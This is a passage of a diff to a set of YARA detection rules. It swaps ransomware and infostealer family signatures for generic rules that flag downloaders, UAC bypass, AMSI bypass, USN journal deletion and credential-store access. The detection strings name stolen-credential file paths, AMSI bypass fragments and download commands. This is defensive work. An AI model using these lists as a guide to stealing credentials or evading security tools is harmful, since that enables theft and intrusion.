+		$id11 = "76497 - 640 - 6308873 - 23835" fullword ascii wide
+		$id12 = "76487 - 640 - 1464517 - 23259" fullword ascii wide
 
 	condition:
-		uint16( 0 ) == 0x457f and 6 of them
+		uint16( 0 ) == 0x5a4d and 2 of them
 }
-rule DITEKSHEN_MALWARE_Win_Avaddon : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_AHK_Downloader : FILE
 {
 	meta:
-		description = "Avaddon ransomware payload"
+		description = "Detects AutoHotKey binaries acting as second stage droppers"
 		author = "ditekSHen"
-		id = "d5618c8a-17b7-5009-9947-a6462ad2a4af"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "ac8320ed-a9e1-5660-a50f-ec010ac162a6"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1378-L1395"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L184-L196"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fc3032572d2ab2550d3dde738a3d403459da9b5b640acc814596d958b83620bf"
-		score = 75
-		quality = 75
+		logic_hash = "8806d8c03adb4ea4cd9b806f8f8c21e561b39b5602c70d09ed193e35e1502d35"
+		score = 40
+		quality = 45
 		tags = "FILE"
+		importance = 20
 
 	strings:
-		$s1 = "\\IMAGEM~1.%d\\VISUA~1\\BIN\\%s.exe" ascii
-		$s2 = "\\IMAGEM~1.%.2d-\\VISUA~1\\BIN\\%s.exe" ascii
-		$s3 = "\\IMAGEM~1.%d-Q\\VISUA~1\\BIN\\%s.exe" ascii
-		$s4 = "\\IMAGEM~1.%d\\%s.exe" ascii
-		$s5 = "EW6]>mFXDS?YBi?W5] CY 4Z8Y BY7Y BZ8Z CY7Y AY8Z CZ8Y!Y:Z" ascii
-		$s6 = "FY  AY 'Z      ;W      @Y  @Y 'Z    Y  @Y (Z" ascii
-		$s7 = "\"rcid\":\"" fullword ascii
-		$s8 = "\"ip\":\"" fullword ascii wide
-		$s9 = ".?AUANEventIsGetExternalIP@@" fullword ascii
-		$s10 = ".?AUANEventGetCpuMax@@" fullword ascii
+		$d1 = "URLDownloadToFile, http" ascii
+		$d2 = "URLDownloadToFile, file" ascii
+		$s1 = ">AUTOHOTKEY SCRIPT<" fullword wide
+		$s2 = "open \"%s\" alias AHK_PlayMe" fullword wide
+		$s3 = /AHK\s(Keybd|Mouse)/ fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 8 of them
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $d* ) and 1 of ( $s* ) )
 }
-rule DITEKSHEN_MALWARE_Win_Prolock : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Uacbypass_CMSTPCOM : T1218 FILE
 {
 	meta:
-		description = "ProLock ransomware payload"
+		description = "Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)"
 		author = "ditekSHen"
-		id = "88fa19ba-238c-5d4d-bf0c-d421ee2ecf1d"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "cdcf6e29-6ee7-5ac7-bd52-c8d42f3f8bf6"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1397-L1413"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L198-L213"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b7d2cc71acc4f643a86781d957afcf5203a2f4034b9ca7da93e8227ddee79f3b"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Ransomware.ProLock"
+		logic_hash = "d198db97901475c0dd10603875fc339d8a7c6d40c7f9c22cda31bb0b1d6d0f2a"
+		score = 40
+		quality = 39
+		tags = "T1218, FILE"
+		importance = 20
 
 	strings:
-		$s1 = ".flat" fullword ascii
-		$s2 = ".data" fullword ascii
-		$s3 = ".api" fullword ascii
-		$s4 = "RtlZeroMemory" fullword ascii
-		$s5 = "LoadLibraryA" fullword ascii
-		$s6 = "Sleep" fullword ascii
-		$s7 = "lstrcatA" fullword ascii
-		$s8 = { 55 89 E5 8B 45 08 EB 00 89 45 EC 8D 15 4F 10 40 00 8D 05 08 10 40 00 83 E8 08 29 C2 8B 45 EC 01 C2 31 }
+		$guid1 = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" ascii wide nocase
+		$guid2 = "{3E000D72-A845-4CD9-BD83-80C07C3B881F}" ascii wide nocase
+		$guid3 = "{BA126F01-2166-11D1-B1D0-00805FC1270E}" ascii wide nocase
+		$s1 = "CoGetObject" fullword ascii wide
+		$s2 = "Elevation:Administrator!new:" fullword ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $guid* ) and 1 of ( $s* ) )
 }
-rule DITEKSHEN_MALWARE_Win_Purplewave : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store : FILE
 {
 	meta:
-		description = "PurpleWave infostealer payload"
+		description = "Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers"
 		author = "ditekSHen"
-		id = "6f978190-4b4d-5346-9218-0c9104254b45"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "07223564-bf4f-5fcd-ad3d-b67eb3baea8e"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1415-L1432"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L345-L359"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "98dca005d2fdf7eea89661e162292451b544847a7f8b63c8c25c82241ec8e04a"
-		score = 75
-		quality = 25
+		logic_hash = "5350f79b01e8e8ae9e0607aa02965cd9ccc52c59a901abcb51e401476cb0fa3a"
+		score = 40
+		quality = 31
 		tags = "FILE"
+		importance = 20
 
 	strings:
-		$s1 = "/loader/" fullword ascii
-		$s2 = "\\load_" fullword wide
-		$s3 = "boundaryaswell" fullword ascii
-		$s4 = "[passwords]" ascii
-		$s5 = "[is_encrypted]" ascii
-		$s6 = "[cookies]" ascii
-		$s7 = ".?AVMozillaBrowser@@" fullword ascii
-		$s8 = ".?AVChromeBrowser@@" fullword ascii
-		$s9 = ".?AV?$money" ascii
-		$s10 = "at t.me/LuckyStoreSupport" ascii
+		$s1 = "key3.db" nocase ascii wide
+		$s2 = "key4.db" nocase ascii wide
+		$s3 = "cert8.db" nocase ascii wide
+		$s4 = "logins.json" nocase ascii wide
+		$s5 = "account.cfn" nocase ascii wide
+		$s6 = "wand.dat" nocase ascii wide
+		$s7 = "wallet.dat" nocase ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 7 of them
+		uint16( 0 ) == 0x5a4d and 3 of them
 }
-rule DITEKSHEN_MALWARE_Java_Pyrogenic
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Referenfces_File_Transfer_Clients : FILE
 {
 	meta:
-		description = "Pyrogenic/Qealler infostealer payload"
+		description = "Detects executables referencing many file transfer clients. Observed in information stealers"
 		author = "ditekSHen"
-		id = "2b9268f0-2f73-51ad-ab72-9289e42e5bb1"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "0967c8d6-fc80-5341-9974-c6f16f024c2c"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1434-L1446"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L418-L472"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bb8cb939f06a376f72dcbbb1f04ec34526f72c3bcc3b146b905a8466826d2c24"
-		score = 75
-		quality = 75
-		tags = ""
+		logic_hash = "49daece8c3da43b3dba26ab6f71fa5c27d3a6ab2c0427b3d2613c1feb25458de"
+		score = 40
+		quality = 20
+		tags = "FILE"
+		importance = 20
 
 	strings:
-		$s1 = "bbb6fec5ebef0d93" ascii wide
-		$s2 = "2a898bc98aaf6c96f2054bb1eadc9848eb77633039e9e9ffd833184ce553fe9b" ascii wide
-		$s3 = "addShutdownHook" ascii wide
-		$s4 = "obfuscated/META-INF/QeallerV" ascii wide
-		$s5 = "globalIpAddress" ascii wide
+		$s1 = "FileZilla\\recentservers.xml" ascii wide
+		$s2 = "Ipswitch\\WS_FTP\\" ascii wide
+		$s3 = "SOFTWARE\\\\Martin Prikryl\\\\WinSCP 2\\\\Sessions" ascii wide
+		$s4 = "SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions" ascii wide
+		$s5 = "CoreFTP\\sites" ascii wide
+		$s6 = "FTPWare\\COREFTP\\Sites" ascii wide
+		$s7 = "HKEY_CURRENT_USERSoftwareFTPWareCOREFTPSites" ascii wide
+		$s8 = "FTP Navigator\\Ftplist.txt" ascii wide
+		$s9 = "FlashFXP\\3quick.dat" ascii wide
+		$s10 = "SmartFTP\\" ascii wide
+		$s11 = "cftp\\Ftplist.txt" ascii wide
+		$s12 = "Software\\DownloadManager\\Passwords\\" ascii wide
+		$s13 = "jDownloader\\config\\database.script" ascii wide
+		$s14 = "FileZilla\\sitemanager.xml" ascii wide
+		$s15 = "Far Manager\\Profile\\PluginsData\\" ascii wide
+		$s16 = "FTPGetter\\Profile\\servers.xml" ascii wide
+		$s17 = "FTPGetter\\servers.xml" ascii wide
+		$s18 = "Estsoft\\ALFTP\\" ascii wide
+		$s19 = "Far\\Plugins\\FTP\\" ascii wide
+		$s20 = "Far2\\Plugins\\FTP\\" ascii wide
+		$s21 = "Ghisler\\Total Commander" ascii wide
+		$s22 = "LinasFTP\\Site Manager" ascii wide
+		$s23 = "CuteFTP\\sm.dat" ascii wide
+		$s24 = "FlashFXP\\4\\Sites.dat" ascii wide
+		$s25 = "FlashFXP\\3\\Sites.dat" ascii wide
+		$s26 = "VanDyke\\Config\\Sessions\\" ascii wide
+		$s27 = "FTP Explorer\\" ascii wide
+		$s28 = "TurboFTP\\" ascii wide
+		$s29 = "FTPRush\\" ascii wide
+		$s30 = "LeapWare\\LeapFTP\\" ascii wide
+		$s31 = "FTPGetter\\" ascii wide
+		$s32 = "Far\\SavedDialogHistory\\" ascii wide
+		$s33 = "Far2\\SavedDialogHistory\\" ascii wide
+		$s34 = "GlobalSCAPE\\CuteFTP " ascii wide
+		$s35 = "Ghisler\\Windows Commander" ascii wide
+		$s36 = "BPFTP\\Bullet Proof FTP\\" ascii wide
+		$s37 = "Sota\\FFFTP" ascii wide
+		$s38 = "FTPClient\\Sites" ascii wide
+		$s39 = "SOFTWARE\\Robo-FTP 3.7\\" ascii wide
+		$s40 = "MAS-Soft\\FTPInfo\\" ascii wide
+		$s41 = "SoftX.org\\FTPClient\\Sites" ascii wide
+		$s42 = "BulletProof Software\\BulletProof FTP Client\\" ascii wide
+		$s43 = "BitKinex\\bitkinex.ds" ascii wide
+		$s44 = "Frigate3\\FtpSite.XML" ascii wide
+		$s45 = "Directory Opus\\ConfigFiles" ascii wide
+		$s56 = "SoftX.org\\FTPClient\\Sites" ascii wide
+		$s57 = "South River Technologies\\WebDrive\\Connections" ascii wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-rule DITEKSHEN_MALWARE_Win_Agentteslav3 : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_Usndeletejournal : FILE
 {
 	meta:
-		description = "AgentTeslaV3 infostealer payload"
+		description = "Detects executables containing anti-forensic artifacts of deleting USN change journal. Observed in ransomware"
 		author = "ditekSHen"
-		id = "c44c69dd-5e95-595c-88c7-89e243648198"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "eafc7ed9-d0e7-562d-8215-6f3feddee27a"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1448-L1481"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L612-L628"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6c62b2f601eba3c83b60f7f6dbd3d0ec3c01af30f4312df897bb5e902c36fdac"
-		score = 75
-		quality = 73
+		logic_hash = "1920fc2bc8c3628016bb91403960f5fbb101b5822f553c1f28d9502841a9832c"
+		score = 40
+		quality = 35
 		tags = "FILE"
+		importance = 20
 
 	strings:
-		$s1 = "get_kbok" fullword ascii
-		$s2 = "get_CHoo" fullword ascii
-		$s3 = "set_passwordIsSet" fullword ascii
-		$s4 = "get_enableLog" fullword ascii
-		$s5 = "bot%telegramapi%" wide
-		$s6 = "KillTorProcess" fullword ascii
-		$s7 = "GetMozilla" ascii
-		$s8 = "torbrowser" wide
-		$s9 = "%chatid%" wide
-		$s10 = "logins" fullword wide
-		$s11 = "credential" fullword wide
-		$s12 = "AccountConfiguration+" wide
-		$s13 = "<a.+?href\\s*=\\s*([\"'])(?<href>.+?)\\1[^>]*>" fullword wide
-		$g1 = "get_Clipboard" fullword ascii
-		$g2 = "get_Keyboard" fullword ascii
-		$g3 = "get_Password" fullword ascii
-		$g4 = "get_CtrlKeyDown" fullword ascii
-		$g5 = "get_ShiftKeyDown" fullword ascii
-		$g6 = "get_AltKeyDown" fullword ascii
-		$m1 = "yyyy-MM-dd hh-mm-ssCookieapplication/zipSCSC_.jpegScreenshotimage/jpeg/log.tmpKLKL_.html<html></html>Logtext/html[]Time" ascii
-		$m2 = "%image/jpg:Zone.Identifier\\tmpG.tmp%urlkey%-f \\Data\\Tor\\torrcp=%PostURL%127.0.0.1POST+%2B" ascii
-		$m3 = ">{CTRL}</font>Windows RDPcredentialpolicyblobrdgchrome{{{0}}}CopyToComputeHashsha512CopySystemDrive\\WScript.ShellRegReadg401" ascii
-		$m4 = "%startupfolder%\\%insfolder%\\%insname%/\\%insfolder%\\Software\\Microsoft\\Windows\\CurrentVersion\\Run%insregname%SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\RunTruehttp" ascii
-		$m5 = "\\WindowsLoad%ftphost%/%ftpuser%%ftppassword%STORLengthWriteCloseGetBytesOpera" ascii
+		$cmd1 = "fsutil.exe" ascii wide nocase
+		$s1 = "usn deletejournal /D C:" ascii wide nocase
+		$s2 = "fsutil.exe usn deletejournal" ascii wide nocase
+		$s3 = "fsutil usn deletejournal" ascii wide nocase
+		$s4 = "fsutil file setZeroData offset=0" ascii wide nocase
+		$ne1 = "fsutil usn readdata C:\\Temp\\sample.txt" wide
+		$ne2 = "fsutil transaction query {0f2d8905-6153-449a-8e03-7d3a38187ba1}" wide
+		$ne3 = "fsutil resource start d:\\foobar d:\\foobar\\LogDir\\LogBLF::TxfLog d:\\foobar\\LogDir\\LogBLF::TmLog" wide
+		$ne4 = "fsutil objectid query C:\\Temp\\sample.txt" wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and ( 8 of ( $s* ) or ( 6 of ( $* ) and all of ( $g* ) ) ) ) or ( 2 of ( $m* ) )
+		uint16( 0 ) == 0x5a4d and ( not any of ( $ne* ) and ( ( 1 of ( $cmd* ) and 1 of ( $s* ) ) or 1 of ( $s* ) ) )
 }
-rule DITEKSHEN_MALWARE_Win_Taurus : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_Geninfostealer : FILE
 {
 	meta:
-		description = "Taurus infostealer payload"
+		description = "Detects executables containing common artifacts observed in infostealers"
 		author = "ditekSHen"
-		id = "c02114c1-9c97-5d0c-b7ce-1bd6a00a9e9a"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "531d8f7f-dee5-5d05-9293-f1ab5d5ac780"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1483-L1519"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L630-L657"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6039c27e69b47dfcc1327c34306627d2d9bd57f6bd365bb80b47ad21f892ae8a"
-		score = 75
-		quality = 48
+		logic_hash = "f9e6f6b470e010d362db55fcf563f85a3a408ef8331c04a157f2676442b63b1a"
+		score = 40
+		quality = 31
 		tags = "FILE"
+		importance = 20
 
 	strings:
-		$s1 = "t.me/taurus_se" ascii
-		$s2 = "rus_seller@explo" ascii
-		$s3 = "/c timeout /t 3  & del /f /q" ascii
-		$s4 = "MyAwesomePrefix" ascii
-		$txt1 = "LogInfo.txt" fullword ascii
-		$txt2 = "Information.txt" fullword ascii
-		$txt3 = "General\\passwords.txt" fullword ascii
-		$txt4 = "General\\forms.txt" fullword ascii
-		$txt5 = "General\\cards.txt" fullword ascii
-		$txt6 = "Installed Software.txt" fullword ascii
-		$txt7 = "Crypto Wallets\\WalletInfo.txt" fullword ascii
-		$txt8 = "cookies.txt" fullword ascii
-		$url1 = "/cfg/" wide
-		$url2 = "/loader/complete/" wide
-		$url3 = "/log/" wide
-		$url4 = "/dlls/" wide
-		$upat = /\.exe;;;\d;\d;\d\]\|\[http/
-		$x1 = "Vaultcli.dll" fullword ascii
-		$x2 = "Bcrypt.dll" fullword ascii
-		$x3 = "*.localstor" ascii
-		$x4 = "operator<=>" fullword ascii
-		$x5 = ".data$rs" fullword ascii
-		$x6 = "https_discordap" ascii
-		$o1 = { 53 56 8b 75 08 8d 85 64 ff ff ff 57 6a ff 6a 01 }
-		$o2 = { 6a 00 68 00 04 00 00 ff b5 a8 fe ff ff ff b5 ac }
-		$o3 = { ff 75 0c 8d 85 44 ff ff ff 50 e8 aa f7 ff ff 8b }
-		$o4 = { 8b 47 04 c6 40 19 01 8d 85 6c ff ff ff 8b 0f 50 }
-		$o5 = { 8d 8d ?? ff ff ff e8 5b }
+		$f1 = "FileZilla\\recentservers.xml" ascii wide
+		$f2 = "FileZilla\\sitemanager.xml" ascii wide
+		$f3 = "SOFTWARE\\\\Martin Prikryl\\\\WinSCP 2\\\\Sessions" ascii wide
+		$b1 = "Chrome\\User Data\\" ascii wide
+		$b2 = "Mozilla\\Firefox\\Profiles" ascii wide
+		$b3 = "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2" ascii wide
+		$b4 = "Opera Software\\Opera Stable\\Login Data" ascii wide
+		$b5 = "YandexBrowser\\User Data\\" ascii wide
+		$s1 = "key3.db" nocase ascii wide
+		$s2 = "key4.db" nocase ascii wide
+		$s3 = "cert8.db" nocase ascii wide
+		$s4 = "logins.json" nocase ascii wide
+		$s5 = "account.cfn" nocase ascii wide
+		$s6 = "wand.dat" nocase ascii wide
+		$s7 = "wallet.dat" nocase ascii wide
+		$a1 = "username_value" ascii wide
+		$a2 = "password_value" ascii wide
+		$a3 = "encryptedUsername" ascii wide
+		$a4 = "encryptedPassword" ascii wide
+		$a5 = "httpRealm" ascii wide
 
 	condition:
-		(( 3 of ( $s* ) or ( 6 of ( $txt* ) and 2 of ( $s* ) ) or ( $upat and 1 of ( $s* ) and 2 of ( $txt* ) ) or ( all of ( $url* ) and ( 2 of ( $txt* ) or 1 of ( $s* ) ) ) ) or ( uint16( 0 ) == 0x5a4d and all of ( $x* ) or ( all of ( $o* ) and 3 of ( $x* ) ) ) )
+		uint16( 0 ) == 0x5a4d and ( ( 2 of ( $f* ) and 2 of ( $b* ) and 1 of ( $s* ) and 3 of ( $a* ) ) or ( 14 of them ) )
 }
-rule DITEKSHEN_MALWARE_Win_Remoteutilitiesrat : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_PWSH_Asciiencoding_Pattern : FILE
 {
 	meta:
-		description = "RemoteUtilitiesRAT RAT payload"
+		description = "Detects PowerShell scripts containing ASCII encoded files"
 		author = "ditekSHen"
-		id = "1cf3ece1-e723-5302-9673-273381ba7a8b"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "df96d801-1a14-58af-b245-3a4a6ccf22c6"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1521-L1537"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L710-L724"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "179a559f6a6ffbce31595bd613d338bb6ac40b8a083ed0169cde754b6ed756c7"
-		score = 75
-		quality = 75
+		logic_hash = "037ce50a6c6d2bf25163e658c5a8c18950715a52fcdf47162fcd288306acbf9c"
+		score = 40
+		quality = 45
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.RemoteUtilitiesRAT"
+		importance = 20
 
 	strings:
-		$s1 = "rman_message" wide
-		$s2 = "rms_invitation" wide
-		$s3 = "rms_host_" wide
-		$s4 = "rman_av_capture_settings" wide
-		$s5 = "rman_registry_key" wide
-		$s6 = "rms_system_information" wide
-		$s7 = "_rms_log.txt" wide
-		$s8 = "rms_internet_id_settings" wide
+		$enc1 = "[char[]]([char]97..[char]122)" ascii
+		$enc2 = "[char[]]([char]65..[char]90)" ascii
+		$s1 = ".DownloadData($" ascii
+		$s2 = "[Net.SecurityProtocolType]::TLS12" ascii
+		$s3 = "::WriteAllBytes($" ascii
+		$s4 = "::FromBase64String($" ascii
+		$s5 = "Get-Random" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		1 of ( $enc* ) and 4 of ( $s* ) and filesize < 2500KB
 }
-rule DITEKSHEN_MALWARE_Win_Slothfulmedia : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_WMIC_Downloader : FILE
 {
 	meta:
-		description = "SlothfulMedia backdoor payload"
+		description = "Detects files utilizing WMIC for whitelisting bypass and downloading second stage payloads"
 		author = "ditekSHen"
-		id = "e94b6d67-137c-5cfb-9c59-fbeb6cd85f0a"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "bdd6deeb-9d43-55ef-9264-652044ba6938"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1539-L1565"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L765-L776"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6f742e8d9d555b44daaa09835f599c99e16cd39bb106c8f43fbbca7093de462e"
-		score = 75
-		quality = 73
+		logic_hash = "0c665f77659b57770f726297b64780764235ba0e72730c985eea62c116fe97e7"
+		score = 40
+		quality = 45
 		tags = "FILE"
+		importance = 20
 
 	strings:
-		$x1 = /ExtKeylogger(Start|Stop)/ fullword ascii
-		$x2 = /ExtService(Add|Delete|Start|Stop)/ fullword ascii
-		$x3 = /ExtRegKey(Add|Del)/ fullword ascii
-		$x4 = /ExtRegItem(Add|Del)/ fullword ascii
-		$x5 = "ExtUnload" fullword ascii
-		$s1 = "Local Security Process" fullword wide
-		$s2 = "Global%s%d" fullword wide
-		$s3 = "%s%s_%d.dat" fullword wide
-		$s4 = "\\AppIni" fullword wide
-		$s5 = "%s.tmp" fullword wide
-		$s6 = "\\SetupUi" fullword wide
-		$s7 = "%s|%s|%s|%s" fullword wide
-		$s8 = "\\ExtInfo" fullword wide
-		$cnc1 = "/v?m=" fullword ascii
-		$cnc2 = "%s&i=%d" fullword ascii
-		$cnc3 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75" fullword ascii
-		$cnc4 = "Content-Length: %d" fullword ascii
+		$s1 = "WMIC.exe os get /format:\"http" wide
+		$s2 = "WMIC.exe computersystem get /format:\"http" wide
+		$s3 = "WMIC.exe dcomapp get /format:\"http" wide
+		$s4 = "WMIC.exe desktop get /format:\"http" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or 7 of ( $s* ) or all of ( $cnc* ) or ( 1 of ( $x* ) and 4 of ( $s* ) ) )
+		( uint16( 0 ) == 0x004c or uint16( 0 ) == 0x5a4d ) and 1 of them
 }
-rule DITEKSHEN_MALWARE_Win_Ircbot : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_AMSI_Bypass : FILE
 {
 	meta:
-		description = "IRCBot payload"
+		description = "Detects AMSI bypass pattern"
 		author = "ditekSHen"
-		id = "69739d82-9760-5c4e-bf9e-60c60617a12a"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "cdb457b3-1f41-5f58-a482-a00d269c1293"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1567-L1596"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L778-L791"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1ea640202cfbd0c3425a192c45938f632dc644f41c7974118e7491b026122818"
-		score = 75
-		quality = 67
+		logic_hash = "b398c20a0e7b2dff5fab87575c555b657749d7c3b3e8f1a0f99db7e8f669e3ce"
+		score = 40
+		quality = 45
 		tags = "FILE"
+		importance = 20
 
 	strings:
-		$s1 = ".okuninstall" fullword wide
-		$s2 = ".oksnapshot" fullword wide
-		$s3 = "\\uspread.vbs" fullword wide
-		$s4 = "KEYLogger" ascii nocase
-		$s5 = "GetKeyLogs" fullword ascii
-		$s6 = "GetLoocationInfo" fullword ascii
-		$s7 = "CaputerScreenshot" fullword ascii
-		$s8 = "get_SCRIPT_DATA" fullword ascii
-		$s9 = /irc_(server|nickname|password|channle)/ fullword ascii
-		$s10 = "machine_screenshot" fullword ascii
-		$s11 = "CollectPassword" fullword ascii
-		$s12 = "USBInfection" fullword ascii nocase
-		$cnc1 = "&command=UpdateAndGetTasks&machine_id=" wide
-		$cnc2 = "&machine_os=1&privateip=" wide
-		$cnc3 = "&command=InsertTaskExecution&excuter_id=" wide
-		$cnc4 = "&command=RegisterNewMachine" wide
-		$cnc5 = "&command=UpdateNewMachine" wide
-		$cnc6 = "&command=GetPayloads&keys=" wide
-		$cnc7 = "&command=SaveSnapshot" wide
-		$pdb = "\\Projects\\USBStarter\\USBStarter\\obj\\Release\\USBStarter.pdb" ascii
+		$v1_1 = "[Ref].Assembly.GetType(" ascii nocase
+		$v1_2 = "System.Management.Automation.AmsiUtils" ascii
+		$v1_3 = "GetField(" ascii nocase
+		$v1_4 = "amsiInitFailed" ascii
+		$v1_5 = "NonPublic,Static" ascii
+		$v1_6 = "SetValue(" ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 7 of ( $s* ) or 3 of ( $cnc* ) or ( $pdb and 2 of them ) )
+		5 of them and filesize < 2000KB
 }
-rule DITEKSHEN_MALWARE_Win_Apocalypse : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_PE_Resourcetuner : FILE
 {
 	meta:
-		description = "Apocalypse infostealer payload"
+		description = "Detects executables with modified PE resources using the unpaid version of Resource Tuner"
 		author = "ditekSHen"
-		id = "f1fa6642-fe42-57e7-a1bc-0f59815049f8"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "2ada52b4-de9e-5b66-a05e-da894ca79e48"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1598-L1615"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L793-L801"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d18ac492ad57cf390f20693cb47ae2c6e3dbdd921fa846130a4bc20047e1aa27"
-		score = 75
-		quality = 75
+		logic_hash = "25959ba2f974ecdcda624b4b34cd8dac0336af0dd7c88d2e3b17ec94d58b87b8"
+		score = 40
